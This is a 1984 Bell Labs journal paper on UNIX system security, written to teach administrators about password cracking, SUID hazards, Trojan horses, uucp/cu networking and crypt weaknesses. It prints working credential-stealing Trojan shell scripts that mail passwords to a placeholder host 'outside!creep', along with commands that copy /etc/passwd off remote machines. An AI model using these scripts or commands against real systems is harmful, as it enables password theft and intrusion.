This paper is aimed primarily at a technical audience and, for that very reason, its usefulness as a tutorial for increased computer system security is diminished. By far, the most important handles to computer security and, indeed, to information security generally, are:
• Physical control of one's premises and computer facilities
• Management commitment to security objectives
• Education of employees as to what is expected of them

* AT&T Bell Laboratories.
Copyright © 1984 AT&T.
• The existence of administrative procedures aimed at increased security.

Unless each of these basics is in place, all of the technical solutions, the special hardware, the software safeguards, and the like are utterly meaningless. We will not address these issues to any great extent in this paper, but we mean to stress our firm conviction that no level of security whatever can be achieved without them.

In discussing the status of security on the various versions of the UNIX operating system, we will try to place our observations in a wider context than just the UNIX system or one particular version of the UNIX system. UNIX system security is neither better nor worse than that of other systems. Any system that provides the same facilities as the UNIX system will necessarily have similar hazards. From its inception, the UNIX system was designed to be user friendly, and most decisions that pitted security against ease of use were heavily weighted in favor of ease of use. The result has been that the UNIX system has become a fertile test bed for the development of reasonable security procedures that interfere to the minimum possible extent with ease of use.

The major weakness of any information system such as the UNIX system resides in the habits and attitudes of the user community. Naivete and carelessness will produce awful security under almost any conditions. It is easy to run a secure computer system.
You merely have to disconnect all dial-up connections and permit only direct-wired terminals, put the machine and its terminals in a shielded room, and post a guard at the door. There are in fact many examples of UNIX systems that are run under exactly these conditions, principally systems that contain classified or sensitive defense information. There are a number of options, implemented either in hardware or in software, that provide a measure of security that is almost this good. Examples are systems that only respond to a dial-up call by calling back on a preassigned number. Many commercially available operating systems make it essentially impossible to create or install any user software or application software without administrative help; some other systems make it virtually impossible to read files belonging to another user, even when the users want to cooperate in their work. All these measures work by restricting access to the system and by reducing the powers that the system gives its users.

The UNIX system was designed to increase, not decrease, the power and flexibility available to its users. It was designed to be easily accessible and to facilitate communication within its user community. Most UNIX systems, not surprisingly, are of the dial-up variety. They provide their users with a general programming ability: to create, install, and use their own programs. All but a few of their files are at least readable by anybody, and most such systems have access to thousands of other systems via remote mail and file transfer facilities. That is, they use the UNIX system as its creators intended it to be used. Such open systems cannot ever be made secure in any strong sense; that is, they are unfit for applications involving classified government information, corporate accounting, records relating to individual privacy, and the like.
Security, though, is not an absolute matter; there are tolerable levels of insecurity and there are balances to be struck, not only between security and accessibility but also between the cost of security measures and the risk or exposure associated with the information being protected. By homely analogy, most family silverware is stored in a cabinet in a house with a lockable door. It is not stored in a box on the front lawn for obvious reasons, but neither is it stored in a bank vault, where it would be much safer than at home, but where it could not easily be used and enjoyed. The insecurity of keeping it at home is both tolerable and appropriate. (Neither of the authors, by the way, keeps any silver in his home.) More homely yet as an example, the notion that firewood, though a commodity of considerable value, might be stored in a bank vault is simply ludicrous. The same balances are appropriate when it is information that is being protected.

Most UNIX systems are far less secure than they can and should be. This unwarranted insecurity is largely caused by complacency and by the use of concealment as a security measure. The administrators do not want word of security problems to be circulated. The bad guys agree, but for different reasons. This attitude produces an unhealthy situation in which administrators and users alike are uninformed about security issues. Much silverware is left on the lawn, and only the bad guys are well informed about the exposure and the risks. Concealment is not security.

The intent of this article is to survey at least the better-known security hazards associated with the UNIX system, and to suggest ways in which security can be improved without greatly diminishing the usefulness of the system to its authorized users. Topics to be covered are:
1. The insecure nature of passwords
2. Protection of files
3. Special privileges and responsibilities of administrators
4. Burglary tools, and protection against them
5. Networking hazards
6.
Data encryption.

All these will be discussed in the context of a community of users who are largely naive about security issues. There is nothing in the above list that is specific to the UNIX system. All of the problems that will be discussed here are system-dependent instances of far more general problems that appear in other forms on other systems. It is inappropriate to construct parallel exhibits from other systems here, but readers might find it rewarding to do this themselves.

Finally, there was more than a little trepidation about publishing this article. There is a fine line between helping administrators protect their systems and providing a cookbook for bad guys. The consensus of the authors and reviewers is that the information presented here is well known: the bad guys know it well, and a more favorable distribution of this knowledge is desirable.

II. PASSWORD SECURITY

The most important, and usually the only, barrier to the unauthorized use of a UNIX system is the password that a user must type in order to gain access to the system. Much attention has been paid to making the UNIX password scheme as secure as possible against would-be intruders.¹ The result is a password file in which only encrypted passwords are kept. A person logging into the system is asked for a password. The password is then encrypted with a one-way transformation, and compared to the encrypted password previously stored in the file. Access is permitted only if the two match. An advantage of this system of password control is that there is no record anywhere of the user's password. No method appears to be known to extract a user's password from the encrypted version that is stored. The one-way encryption has proven to be good enough to thwart a brute-force attack. In practice it is easy to write programs that are extremely successful at extracting passwords from password files, and that are also very economical to run.
They operate, however, by an indirect method that amounts to guessing what a user's password might be, and then trying over and over until the correct one is found. Such programs are commonly called password crackers. They were virtually unknown five years ago, but are widely known today. They work by encrypting a good guess as to what a person's password might be, and comparing this with the encrypted password in the file. Good guesses can be made without any personal knowledge of the people listed in the password file since the file itself provides clues. Each line therein contains, in addition to the encrypted password, the user's login name, home directory, login shell, and, perhaps, some comments. The most important clue is the login name. People who are naive about security issues very often use login names or variants thereof as passwords. For example, if the login name is abc, then abc, cba, and abcabc are excellent candidates for passwords. Experiments involving over one hundred password files have shown that a program that uses only these three guesses requires several minutes of minicomputer time to process a typical password file, and can be counted on to deliver between 8 and 30 percent of the passwords in cases where neither users nor system administrators have been security-conscious.

Other clues can also be had from the password file. There is a comments field that is used in most systems to provide information about a user. It usually contains things like surname, given name, address, telephone number, project name, and so on, all of which can be extremely rewarding to try. Finally, if an intruder knows something about the people using a machine, a whole new set of candidates is available.
Family and friends' names, auto registration numbers, hobbies, and pets are particularly productive categories to try interactively in the unlikely event that a purely mechanical scan of the password file turns out to be disappointing.

Once the hazards are known, remedial steps can be taken to bolster password security. The following are known to be helpful:
1. Make it difficult for outsiders to obtain a copy of a machine's password file. An intruder who is denied a copy of the file must resort to dialing into the target machine and making guesses interactively via the normal login sequence. This takes much more time than simply running a cracker program on one's own machine. Actual login attempts are likely to be expensive, and greatly increase the chance that the intrusion attempt will be discovered by audit software. There is, of course, little that can be done to prevent a malicious insider from shipping the file out the door; but at least steps should be taken so that an outsider cannot use networking arrangements to cause the password file to be shipped out in a response to a request from outside.
2. Remove the encrypted passwords from the password file and place them in a parallel file that is unreadable to the general public and to networking programs like uucp. A considerate touch here is to replace the encrypted fields in the password file with random strings of the proper length and in the alphabet of encrypted passwords. This has the potential for not interfering with legitimate programs that might use the file, and wasting large amounts of an intruder's time.
3. Likewise, keep the comment field elsewhere. Besides removing useful clues, this has the benign side effect of shortening the password file considerably, thereby speeding up programs like ls that search it sequentially.
4. Modify the passwd program to prevent users from installing easily derivable passwords such as abcabc.
5. Educate users about bad passwords and good passwords.
One recipe for good passwords is to pick some common word that is easily remembered but in no way associated with its owner and then to botch it in some way so that it will not be found in a dictionary (e.g., by misspelling it, adding punctuation, and so on). An alternative approach is to assign passwords to users, rather than letting them choose their own. Both methods have weaknesses. Left to their own ways, some people will still use cute doggie names as passwords. What is far more serious is that if randomly generated passwords are assigned, most people will write them down somewhere, often in very obvious places. The former approach seems to be the safer.

It takes continuing ingenuity to keep up with prevailing silly practices in choosing passwords. Several years ago, new software was distributed that required all new passwords to contain at least six characters and at least one nonalphabetic character. (In fact, it rejected both purely alphabetic and purely numeric passwords.) The authors made a survey of several dozen local machines, using as trial passwords a collection of the 20 most common female first names, each followed by a single digit. The total number of passwords tried was, therefore, 200. At least one of these 200 passwords turned out to be a valid password on every machine surveyed.

III. FILES AND FILE SYSTEMS

Every file in a UNIX file system has associated with it a set of permissions that specifies who can access the file and how. The permissions are kept in a 9-bit field that is part of a variable called mode, which is part of a larger structure called an i-node, which describes the file. There is a one-to-one correspondence between files and i-nodes. (To simplify matters, no distinction will be made between ordinary files, directories, and special files, unless a distinction is needed.)
The permission bits specify read, write, and execute permissions for the owner of the file, others in the owner's group, and everybody else. In UNIX software and writings about it, the permissions field is most often presented as either a three-digit octal number or a nine-character string. For example, the mode of a file that can be read, written, or executed by its owner, read and executed by members of the owner's group, and read by everybody else would be 754 or rwxr-xr--. Both notations will be used here, as appropriate. The algorithm used to determine permissions is this:

        if (user is owner) {
                if (permissions are set)
                        it's ok
                else
                        quit
        }
        if (user is in owner's group) {
                if (permissions are set)
                        it's ok
                else
                        quit
        }
        if (permissions are set)
                it's ok

Note especially that the algorithm does not look for all possible conditions, in a hierarchical sense, in which a user might have access to a file. This is done so that a person can create a file whose access permissions are not “kept in the family.” For instance, a file whose mode is set to 007 (------rwx) can be read, written, and executed by anyone except its owner and members of its owner's group. All such permission checking is bypassed if the user is the super-user.

We must mention two additional things about directories. First, since a directory cannot be executed, the bits that would be used to specify execute permissions are instead used to specify search permissions, that is, the ability to climb into a directory or to use it as a component of a path name. Second, underlying directory permissions can adversely affect the safety of seemingly protected files. Suppose that d is a directory whose mode is 730 that contains a file f of mode 644, that both d and f have the same owner and group, and that f contains the text something. Disregarding the super-user, no one besides the owner of f can change its contents, since only the owner has write permission.
Notice, though, that anyone in the owner's group has write permission for d, so that any such person can remove f from d and install a different version:

        rm d/f
        echo something else >d/f

which for most purposes is the equivalent of being able to modify f. Further, had f been a directory rather than a file, the same person could have moved it (and all of its contents) elsewhere and replaced it with an entirely new structure. Thus, to ensure that a file cannot be modified, it is necessary that:
1. The file itself must be write-protected.
2. The directory containing it, and all lower directories, must be similarly protected.
3. Group permissions must be considered.

This last is especially important if most of the users of a system are in the same group, as is the default case on most UNIX systems.

The mode of an existing file can be changed with the chmod command, or, from a C program, by using the system call of the same name. The ownership of a file is changed by using the chown command and system call. Some versions of UNIX restrict chown to the super-user. Others also permit the owner of a file to give it away to someone else. The latter convention provides an opportunity for fraud on systems whose users are charged for their disk space, but there is also a subtler problem that will be discussed in the next section.

Finally, when a file is created, it is given the owner and group IDs of the user who created it, and a mode that corresponds to an argument of the creat or open system call, modified by a user-supplied parameter called a umask. This parameter is also a 9-bit field, each of whose bits specifies that the corresponding permission bit not be set, i.e., the resulting permission field is the logical AND of the file creation mode and the one's complement of the umask. A user's umask is set to some default value at login time, and can subsequently be modified by the user via the umask command or system call.
Simple prudence about accident protection suggests a default umask of 022, which makes files unwritable except by their owners.

The tree of directories and files that makes up a UNIX file system is just a logical structure that is mapped onto a physical device, a disk, in order to make it easy for people to use the disk. If the physical disk can be written or read, so can any file in the file system that resides on the disk. All that is needed is a little knowledge and effort. It follows then that the special files that permit access to the physical disk should be accessible only to the super-user if file protections are to be worth much. In practice, this rule usually is relaxed so that the disks are writable only by the super-user, but that they can also be read by some administrative group.

Finally, access to programs' working storage on a machine is available via the special files /dev/mem (memory) and /dev/kmem (kernel memory). Write permission for memory allows a process to modify itself in any way, including giving itself super-user privileges. Read permission allows it to inspect things like the standard input and output of other processes. Hence, the same precautions that apply to physical disk access apply here also.

There is more to be said about files and file systems, and more will be said later on, after a few pitfalls have been dissected to provide some background.

IV. SUID PROGRAMS

The set-userid (SUID) facility is a novel and useful feature in the UNIX system.² It allows a program to be constructed in such a way that the individual or group ID, or both, of the user who executes the program is changed temporarily for the duration of the program's execution. This makes it trivially easy to write programs that would be difficult or impossible to implement on other operating systems.
76 TECHNICAL JOURNAL, OCTOBER 1984

Any user can set up a game that keeps a score file that is normally protected from others but is open for writing and reading to anyone who is currently playing the game. There are some programs that are similarly easy to write, like ps, which shows what is going on in the system (by reading operating system memory locations); df, which shows disk utilization (by reading the physical disk); and passwd, which lets a user write in the password file to change a password.
Two bits in the mode of a file in which a program is kept determine whether the program will be of the SUID variety. These are kept in an octal digit just to the left of the permission bits. Octal 4xxx changes the user ID to that of the program's owner. Octal 2xxx changes the group ID to that of the owner's group. As with the permissions, these bits are set by chmod. If any user of the system were free to issue the following sequence of commands:

cp /bin/sh a.out
chmod 4777 a.out
chown root a.out

the result would be a shell that would give super-user privileges to anyone who executed it. The danger is obvious, and is disabled by the design of the chown and chmod commands and system calls. The disablement takes one of two forms, depending on the version of the UNIX system.
1. If the version of the UNIX system restricts chown to the super-user, there is no problem.
2. If the version permits a user to give away files, chown first knocks down the SUID bits before changing ownership.
The clear danger is taken care of, but the feature is by no means tame. Over the years it has provided truly horrid security flaws in various versions of the system. Some early versions of the mail command, which ran as super-user so as to be able to write in protected mailboxes, could be coaxed to do things like appending lines to the password file. Some versions of login, when invoked after all available file descriptors were in use, would log a user in as the super-user.
Sending a quit signal to a running SUID program would produce a writable SUID file called core, suitable for debugging and other things. The list is long, but the point is made: the SUID facility is a very powerful tool, and like all powerful tools it must be handled with care. Here are some hints about care.
SUID programs should be used only when there is no other way to get a desired result. On most UNIX systems, perhaps a dozen SUID programs, excluding games, are really needed. A lax attitude about SUID programs, combined with a 'quick and dirty' programming style, can produce disasters. As an example, a security audit on a system on which a number of people working on the same project had need to write in each other's files turned up an alarming fact. The people involved knew next to nothing about how to use groups and were too lazy to learn, so they resorted to SUID programs instead. About 200 of these were found. Half of these were owned by the super-user, and most of these were writable by others, including one called a.out whose permission field was 777. Unfortunately, such sloppiness is not rare.
It is difficult, when users are writing all but the most trivial programs, to determine in advance that the program will be correct. Programs sometimes do the most amazing things in unforeseen circumstances. When SUID programs are being designed and written, it is particularly important to pay attention to simplicity of function and cleanliness of implementation, since unexpected behavior can easily produce security holes. Escapes from SUID programs — child processes that are given a shell — are highly unrecommended. If these cannot be avoided, the designer must carefully consider the consequences of inherited files, signals, the shell's environment, and so on.
Some systems provide a restricted shell whose capabilities are somewhat less than those of the standard shell.
The restrictions are useful in reducing the accident rate among data-entry clerks and in similar applications. Using a restricted shell to contain an intruder is rash. Most of these are about as restrictive as childproof bottle caps.
SUID programs that are writable by anyone besides their owners should be considered threatening. System administrators should verify that the SUID programs that are supplied with the system are clean (i.e., the source has not been tampered with to provide new features, and the binaries have been compiled from the clean source). This last precaution is necessary but not sufficient. In Ref. 3, Thompson shows that compilers can be infected so as to modify the code that they compile, without leaving visible traces of the modification in any source code, even that for the compiler. In practice, such compiler viruses are likely to be rare, simply because they require much more skill and effort than other tampering techniques.

V. TROJAN HORSES

A favorite tool of the intruder is the Trojan horse. As the name implies, a Trojan horse is a program that an intruder gives to an unsuspecting user of a system. It does what it is obviously supposed to do, but it also quietly performs some malfeasance on behalf of the intruder. The technique has been around for thousands of years, and it still works splendidly. Here are some modern instances.
Ritchie 4 shows a noncryptanalytic way of finding out passwords as follows: "Write a program which types out login: on the typewriter and copies whatever is typed to a file of your own. Then invoke the command and go away until the victim arrives". At first glance, this seems to be a case of some legitimate user of a system coveting a neighbor's password, but in fact there are more interesting applications. Also implied is that the horse must faithfully simulate the nontrivial login command, which is a lot of work.
Actually, all that is needed is to simulate an unsuccessful login attempt, as if the user had made a typing mistake, and that is a horse of a different color:

echo -n "login: "
read X
stty -echo
echo -n "Password: "
read Y
echo ""
stty echo
echo $X $Y | mail outside!creep &
sleep 1
echo Login incorrect
stty 0 >/dev/tty

The shell script is simplicity itself with a few kindnesses added to make its victim feel more at home. It asks for a login name and then a password, mails these to the bad guy, announces failure, and hangs up the phone. The user then dials the computer, gets a real login command, carefully types what is asked for, and goes about business as usual, unaware of the swindle. Note that there was no requirement that the horse be planted on the target machine, and in practice this will likely not be the case. Once on the target machine, the intruder can use similar horses to acquire the privileges of other users.
One of the most frequently used commands on UNIX systems is ls, which is UNIX system shorthand for "tell me some things about these files". The ls command can be used in many contexts and with many options, but as was the case with login, a trivialized version can give joy to an intruder:

>somewhere/.harmless
chmod 6777 somewhere/.harmless
sleep 2
echo "(ls: not found"
rm ls

It is placed in an executable file named ls in any writable directory that the victim will search for commands before looking in /bin. When executed, it creates a writable file called .harmless in some far corner of the machine, with the SUID bits turned on in the file's permission mask. It then prints (ls: not found, erases itself, and exits. The ( is indicative of a noisy telephone line. People are used to it, and will automatically retype a command that gets such a hit. When the command is retyped, the horse is gone, and the real ls is executed.
Sometime later, the intruder will copy the shell into .harmless, execute it, and assume the identity of the victim.
The most desirable identity for the intruder to assume is that of the super-user. System administrators acquire super-user privileges by executing a program called su. The su command asks for the root password and bestows systemwide privileges to those who type it correctly. A horse named su, placed where it will be executed by a system administrator, can usually be relied on to send a gift within hours:

stty -echo
echo -n "Password: "
read X
echo ""
stty echo
echo $X | mail outside!creep &
sleep 1
echo Sorry
rm su

Horses like this are easy to make and can be custom-tailored to suit a wide variety of applications. Knowing how they work suggests ways to defend against them, as discussed below.
In order for horses like ls and su to work, they must be planted in places where they will be executed by their intended victims. The operating system searches for commands in a sequence of directories named in a string called PATH that is associated with each user. PATH is set each time a user logs in, and may be modified in the course of the terminal session. Typically, it specifies the user's current working directory, perhaps a private directory, /bin and /usr/bin, usually in that order. If the directories that are searched prior to /bin are not writable by the intruder, the horse cannot be planted. Such protection is most important for system administrators.
A secondary level of protection can be achieved by having people's .profile files unreadable, so that an intruder is not shown the intended victim's initial PATH setting. This turns out to be a minor nuisance, and offers little additional protection, as vulnerable PATH components can be deduced in other ways. Modifying the (real) su program so that it insists upon being invoked by a full path name is very effective.
The change is trivial — the program needs only to check that the first character of its zeroth argument is /. Legitimate users very quickly fall into the habit of typing /bin/su rather than su, thereby guaranteeing that the official version gets executed, regardless of whether a horse is nearby. A further recommended change to su is that on successful invocation it changes the PATH string so that only /bin and /usr/bin will be searched for commands. This prevents nonstandard versions of commands like ls from being executed with super-user privileges.
There is no defense against the login horse except user education. Anyone who walks up to a previously unattended terminal that says "login:" and types in the keys to the machine is fair game.

VI. NETWORKING

Several times in the previous discussion it was tacitly assumed that files pertaining to the security of a system — in particular, the password file — might very well be available to an intruder who had not yet managed to penetrate the system. It turns out that the same communications programs that facilitate the exchange of ideas and information among people on different machines can, unless great care is taken, be used to subvert a machine from a safe distance.
The uucp program 5 makes it possible to copy files from one UNIX system to another, and is the workhorse of UNIX networking. Indeed, the ease of information interchange by way of uucp and programs like mail that use it accounts for much of the usefulness and popularity of the UNIX system. The problem with uucp is that, if left unrestricted, it will let any outside user execute any commands and copy out or in any file that is readable/writable by a uucp login user. It is up to the individual sites to be aware of this and apply the protections that they think are necessary. 6 If the administrator of a site is naive or inattentive, getting a password file from that site can be as easy as typing

uucp -m target!/etc/passwd gift

to copy the remote machine's password file to a local file called gift. (The -m option is a convenience, not a necessity. It causes uucp to send mail to the intruder when the gift has arrived.) Three years ago, this ploy was almost certain to succeed. Today, many (but not all) systems have restrictions on which files can be accessed and by whom. Typically, they restrict access to a directory reserved for that purpose: /usr/spool/uucppublic.
If the direct approach is spurned, uux might be tried. The uux program is part of the uucp system. It causes execution of programs to take place on remote systems. Its main use — in practice, almost its only use — is to start up the mail delivery machinery on a remote system after uucp has delivered the mail files to a spooling area. Like uucp though, it has full generality built in, and it may be possible to successfully execute a command like:

uux "target!cat /etc/passwd >/usr/spool/uucppublic/gift"

This copies the password file to the remote machine's spool directory, from which it can later be plucked. Like uucp, uux may have some restrictions, but there is a difference: to ensure generality, the remote system passes the arguments of uux to a shell for interpretation and execution. The far end of a uucp transaction needs only to see whether access to some file is legitimate, but the far end of a uux transaction must examine the command and its context and decide whether the result will be harmful. The latter is extremely difficult, because the shell, like most other macroinstruction processors, has some very complex quoting conventions deliberately designed to hide certain types of strings until the proper time for their expansion. An intruder with sufficient shell programming experience is likely to succeed here.
Finally, given that neither uucp nor uux will perform as directed, there is always the option of making a private copy of uucp.
No special permissions are required, either to run the program or to access the telephone dialers. The private copy can assert that it is calling from anywhere, and there is no way for the called machine to verify the claim. Thus, an intruder stands a good chance of dialing into one of a cluster of friendly machines, masquerading as one of the family, and finding access permissions greatly relaxed.
Another communications program, called cu, is especially appealing to intruders. The name cu stands for "call UNIX". It allows a user of a UNIX system to call another system, not necessarily a UNIX system, and to conduct an interactive session on the remote machine. A typical cu session starts like this:

$ cu 5551212
Connected
login: user
Password:
$ [session from here until ~.]

Note the sequence of events. The cu command is invoked and given the telephone number of the remote machine. A connection is made, and the user is asked for a login name and a password. If these are correctly given, the session proceeds as if the user had manually dialed in. The session ends when the user types a line beginning with "~.".
Consider two machines, one on which very careful attention has been paid to security concerns, and another on which security issues have been utterly neglected. An intruder on the weak machine need only install a horse — a version of cu that, in addition to making connections, also copies the first few lines of a session somewhere — to obtain the keys to the strong machine. It would seem that a good rule to follow with cu could be never to use it to get from a weak machine to a stronger machine, but sometimes this is not sufficient.
The command cu allows escape sequences that are not transmitted to the remote machine, but instead cause certain useful functions to be performed.
For example, any line beginning with ~%put tells cu to copy a file from the local machine to the remote; lines beginning with ~%take cause things to go the other way. Of special interest are lines beginning with ~! that cause commands to be executed on the local machine: ~!mail lets a user read mail on the local machine while still connected to the remote.
For some versions of cu, the local machine cannot tell how a line was generated when it gets it from the remote machine. It just has a line of text. If the line says

~!mail somewhere < /etc/passwd

it may have been typed deliberately by the user, it may have been written to the user's terminal by a bad guy on the remote machine, or it may have been contained in a file on the remote machine that the user had been printing. The result is the same in any case: the password file is tossed over the wall.
The ct command causes a machine to call out to a terminal in order to let that terminal log in to the machine. It is otherwise identical to the cu command, but from an intruder's point of view, the target machine gets to pay the phone bill. This reduced cost is counterbalanced by the greatly increased risk of getting caught by audit procedures.
Finally, there are Local Area Networks (LANs). These are arrangements in which some kind of high-speed communications channel is used to connect a cluster of machines that are geographically close to one another (e.g., a dozen machines in the same building). The intent of a LAN is usually not only to make it easy to share information, but also to provide users of all the machines in the network with handy access to resources (such as typesetters) that are not economical to replicate on each machine. Unlike uucp and cu, which are fairly standard, LANs come in many different flavors. It would be unkind and not very useful to dissect some particular LAN here, and trying to cover even the more popular ones would require a long and mostly uninteresting book.
The hazards are exactly those of uucp and cu: remote execution, masquerading, and faulty access permissions. The forms that the attacks will take are of course different.
Security holes in machine-to-machine communications are well known, and sometimes difficult to fix. No special permissions are inherently required to access communications devices. This makes it possible to obtain a private copy of a communications program and to modify it so that it calls out masquerading as some other machine or some other user. Even if special privileges were required, little would be gained, as the threat is to the remote, as yet uncompromised, machine, not the local machine on which an intruder has presumably already obtained the required permissions. Given that a remote machine cannot reliably identify its caller, allowing the remote execution of arbitrary commands is a sure way to invite trouble. Remote execution of a shell is deadly, but even an innocuous command like cat can be used to an intruder's advantage.
The uucp program that is used by most UNIX machines was not written with security in mind. It can do just about anything, and it is up to the system administrator to restrict its capabilities. The restrictions needed are by no means obvious. The cure is to rewrite uucp so that it is able to deliver mail, to copy files to and from spool directories, and to send out data only when it has initiated the connection. We did this in our research environment some time ago. 7 Other efforts are in progress elsewhere. 8,9
The cu program can be a security disaster. Banning it from a machine or restricting access to devices will do no good at all, for the obvious reasons. The best that can be done is to educate users:
1. Do not use cu from a machine that is not trusted.
2. Do not use cu to a machine that is not trusted.
3. Do not browse on the remote machine.
(This advice is remarkably similar to that which parents give their children: "Do not go for a ride with a stranger.") Local area networks should be treated as individual machines for security purposes.

VII. ENCRYPTED FILES

UNIX systems are distributed with a command called crypt, which is used to encrypt and decrypt files. 10 Cleartext is supplied as input to the program. A key (the cryptologist's term for a password) is either given on the command line or supplied interactively, and ciphertext is output. The transformation performed by crypt is its own inverse, so that using the same key converts ciphertext to cleartext. The crypt command is used in many applications, and often very unwisely, as its safety depends on a very large number of factors that are often not considered by naive users. The purpose of this section is to present those facts that ought to be considered, so that the user can make an informed decision about a particular application.
It is possible to decrypt an encrypted file without knowledge of its key. This is hardly surprising, as successful methods of attacking rotor machines have been known for over 50 years. 11 The job can be very time-consuming; it is not just a matter of aiming some magic program at a file of ciphertext and obtaining cleartext. The method is described in detail in a companion paper by Reeds and Weinberger. 12 The amount of work that it takes to decrypt a file varies, depending on what clues are available. For a file of encrypted English text, several hours of work is not atypical.
Decryption of files can be made easy or hard, depending on how crypt is used. A one-size-fits-all approach to key selection is a particularly bad idea. It goes without saying that a user's login password, if known, will be tried as a possible key, but there are other problems. If ten files are encrypted with the same key, then all ten files can be decrypted when only one is done.
Moreover, having more than one file encrypted with the same key lets a cryptanalyst switch to a different target when guessing at probable text gets hard. Very frequently, a user of crypt will forget to remove a cleartext file after producing an encrypted version. Such cleartext can only be described as 'gold'. Executable programs (binaries) that have not been stripped of their predictable symbol tables are vulnerable. Double encryption, that is, passing text through crypt twice, makes the job of decryption harder, but not much. Simple-minded preprocessing schemes, such as exclusive ORing the file with some constant, do not help. Preprocessing the cleartext so that there is no longer a one-to-one correspondence between clear- and cipher-bytes dramatically weakens the attack. For example, using the pack command to get a Huffman-encoded version of the file before passing it through crypt ensures that characters will cross byte boundaries, thus rendering byte-oriented decryption techniques useless.
Much more dangerous are the noncryptanalytic attacks. The techniques for guessing passwords are exactly those for guessing keys. And a Trojan horse version of crypt can take minutes, not hours, for an intruder to install.
Finally, the frequency distribution of the bytes in an encrypted file is uniform. This is so unlike those of other files in the system that such files practically scream for the attention of an intruder. This is well worth remembering.

VIII. MISGUIDED EFFORTS

It is one thing to clean up a system by plugging open holes, and quite another to install security machinery that collects evidence of possible chicanery. The latter can be very useful or very dangerous, depending on how it is done, since it often happens that information that is helpful to system administrators can be just as helpful — or more so — to an intruder. Here are some security tools that can help weaken system security.

8.1 Logging su activity

The su command allows a user to assume the identity of any other user (the default being root, the super-user) if the password corresponding to the desired new identity is correctly given. As a security measure, most implementations of su also append a line to a log file called sulog. The line contains a time stamp, the name of the user, the proposed new identity, and a flag showing whether the transformation succeeded. Clearly, this file must be protected from writing by all but the super-user.
Normally, only a small number of people on a given machine are supposed to have super-user privileges, and all of these should be known to the system administrator. Thus, by looking in sulog for those who have become root, the administrator can get a very short list of names in which a stranger will likely stand out like a sore thumb. Now consider the plight of an intruder who has just used a borrowed password to break into a strange machine, and who now has the task of locating the important people from among perhaps hundreds in the password file. Fortunately, the important people can be identified readily by their ability to become super-user. Thus, the same technique applied to the same file produces the same list — but now it is a list of horse targets.
This implies that sulog had better be unreadable as well as unwritable. Such files are difficult to handle for a variety of reasons. Copies and summaries with relaxed permissions are likely to be owned by the important people.
The sulog file thus appears to help both the defenders and the attackers. This would indeed be the case if there were ever a need for an intruder to make an entry in the file. There is no such need. Only the most inexperienced intruder will use the su command to try out a guess or a pilfered password.
The indirect approach of encrypting the guess and comparing it with the password file entry will provide verification without leaving any tracks. Once sure of a password, the intruder can then use su, and just remove the last telltale line from sulog. If sulog exists on a machine, no matter how it is protected or what it is called, then there is a potential risk for the administrator but none for the knowledgeable intruder. The way to reverse the score is to keep the tracks off the machine, where they cannot be accessed, even by the super-user. The paper console copy in the machine room is a very good place, especially if the system administrator reads it occasionally.

8.2 Password aging

One of the many problems with passwords is that most people, left unreminded, will keep a password forever. The longer a password is used, the greater the chance that it will become compromised. Also, stolen passwords are useful to their thief for as long as they remain valid. Most UNIX systems are provided with a feature called password aging, which, if activated by the system administrator, will cause users of the system to change their passwords every so often. The goal is laudable. The algorithm, however, is bad, and the implementation, from a security standpoint, is just awful.
Within systems in which the feature is used, the system administrator assigns, on a user-by-user basis, the length of time that a password can remain valid. The first time that a user whose password has rotted attempts to log into the system, the message

Your password has expired. Choose a new one

is printed and the user is made to execute the passwd command rather than the shell. The passwd command prompts for a new password, installs it, and records the time of installation. Further, to prevent a user from changing a password from x to y and then promptly back to x, passwd will refuse to change a password that is less than a week old. Four things are wrong here.
First, picking good passwords, while not very difficult, does require a little thought, and the surprise that comes just at login time is likely to preclude this. There is no hard evidence to support this conjecture, but it is a fact that the most incredibly silly passwords tend to be found on systems equipped with password aging.
Second, the user who discovers that the new password is unsound or compromised cannot change it within the week without help from the system administrator.
Third, the feature only forces people to toggle back and forth between two passwords. This is not a great gain in security, especially if it encourages the use of less-than-ideal passwords.
Fourth, as implemented, the date and the lifetime of a password are encoded, not encrypted, just after the encrypted password in the password file. It is easy to write a program that scans a password file and prints out a list of abandoned accounts, together with the length of time each account has been unused. Whether this is a horror or a blessing depends on one's point of view.
The aging of passwords is a difficult problem, yet unsolved.

8.3 Recording unsuccessful login attempts

Some systems record unsuccessful login attempts. The login name, time, and terminal number are stored, but the password used is not, for the obvious reasons. The intent of such logging is to alert the system administrator that an intruder stands at the door making guesses at the key.
One reason that login attempts fail is that people sometimes type a password when asked for a login name. Whether this is due to haste, carelessness, inattention, or sluggish system response during peak hours is not known. What is known is that collecting login names from unsuccessful access attempts will almost invariably collect a few passwords as well, and that any login name thus collected that is not found in the system's password file is almost certainly a password. Finding the match is not difficult.
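The point can be made concrete with a small sketch (the log location and its one-name-per-line format are assumptions for illustration; real systems varied):

```shell
#!/bin/sh
# Illustrative sketch: report strings from a failed-login log that match
# no account name; such strings are very likely passwords.
# Arguments (formats are assumptions, not a standard):
#   $1  failed-login log, one attempted login name per line
#   $2  password file, login name in the first colon-separated field
sort -u "$1" | while read -r name; do
    grep -q "^$name:" "$2" || echo "probable password: $name"
done
```

Anything the script prints deserves immediate attention, since it probably matches some account's current password.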
8.4 Disabling accounts based on unsuccessful logins

Some systems will count the number of consecutive unsuccessful login attempts for a particular user and disable the account after some pain threshold is reached. The magic number is usually three. This ploy has the marginal benefit of annoying would-be intruders who go through the unprofitable exercise of casting spells at the door, hoping it will open. For the intruder who has already gained access to the system, and who wants to get rid of the system administrator, the feature is a blessing:

login: guru
password: foo

repeated the appropriate number of times will assure the intruder of privacy for at least a little while.

IX. PEOPLE

By far the greatest security hazard for a system, the UNIX system or otherwise, is the set of people who use it. If the people who use a machine are naive about security issues, the machine will be vulnerable regardless of what is done by the local management. This applies particularly to the system's administrators, but ordinary users should also take heed.

9.1 Administrators' concerns

The system administrator is responsible for overseeing the security of the system as a whole. Several things are especially important.
The password file is the most important file to watch in the system. It should not, of course, be writable by anyone other than the super-user, nor should it be available for perusal by anyone who is not currently logged into the machine. For example, it should not be shipped by uucp in response to an outside request. Login entries with no passwords are very unwise.
Group logins, that is, the use of a single login name and password for a number of people, are to be avoided. The owner of a machine is entitled to know who is using it, and group logins thwart this. Further, the idea of a group login does little to instill in its users the notion that they are individually responsible for their conduct on a machine.
